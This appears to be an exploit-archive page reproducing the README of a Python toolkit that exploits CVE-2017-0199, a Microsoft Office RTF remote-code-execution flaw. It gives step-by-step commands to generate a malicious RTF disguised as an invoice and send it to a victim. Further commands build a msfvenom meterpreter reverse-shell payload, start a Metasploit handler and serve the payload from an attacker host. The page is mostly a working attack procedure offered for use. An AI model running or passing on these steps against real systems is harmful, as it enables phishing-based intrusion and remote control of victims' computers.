CVE-2017-0199 PoC — Microsoft Office 安全漏洞

Source

Associated Vulnerability

Description

Exploit toolkit CVE-2017-0199 - v2.0 is a handy python script which provides a quick and effective way to exploit Microsoft RTF RCE. It could generate a malicious RTF file and deliver metasploit / meterpreter payload to victim without any complex configuration.

Readme

# CVE-2017-0199
Exploit toolkit CVE-2017-0199 - v2.0 is a handy python script which provides a quick and effective way to exploit Microsoft RTF RCE. It could generate a malicious RTF file and deliver metasploit / meterpreter payload to victim without any complex configuration.


Release note:

Introduced following capabilities to the script

- Generate Malicious RTF file using toolkit
- Run toolkit in an exploitation mode as tiny HTA + Web server
Version: Python version 2.7.13

Example:

Step 1: Generate malicious RTF file using following command and send it to victim

  Syntax:

  # python cve-2017-0199_toolkit.py -M gen -w <filename.rtf> -u <http://attacker.com/test.hta>

  Example:

  # python cve-2017-0199_toolkit.py -M gen -w Invoice.rtf -u http://192.168.133.128/logo.doc
Step 2 (Optional, if using MSF Payload) : Generate metasploit payload and start handler

  Example:

  Generate Payload:

  # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe

  Start Handler:

  # msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.133.128; run"
Step 3: Start toolkit in exploitation mode to deliver payloads

  Syntax:

  # python cve-2017-0199_toolkit.py -M exp -e <http://attacker.com/shell.exe> -l </tmp/shell.exe>

  Example:

  # python cve-2017-0199_toolkit.py -M exp -e http://192.168.133.128/shell.exe -l /tmp/shell.exe

File Snapshot

 [4.0K]  /data/pocs/9eb09d5f27f755ef30a22ae9f03cf5648a376456
├── [ 17K]  cve-2017-0199_toolkit.py
└── [1.4K]  README.md

0 directories, 2 files

Remarks